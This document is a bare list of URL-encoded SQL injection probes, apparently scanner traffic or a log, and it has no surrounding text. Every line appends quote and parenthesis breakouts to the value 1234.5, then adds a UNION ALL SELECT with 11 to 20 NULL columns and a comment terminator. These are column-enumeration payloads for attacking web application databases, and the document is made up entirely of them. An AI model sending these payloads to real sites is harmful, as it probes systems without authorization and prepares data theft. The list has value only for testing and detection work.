1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 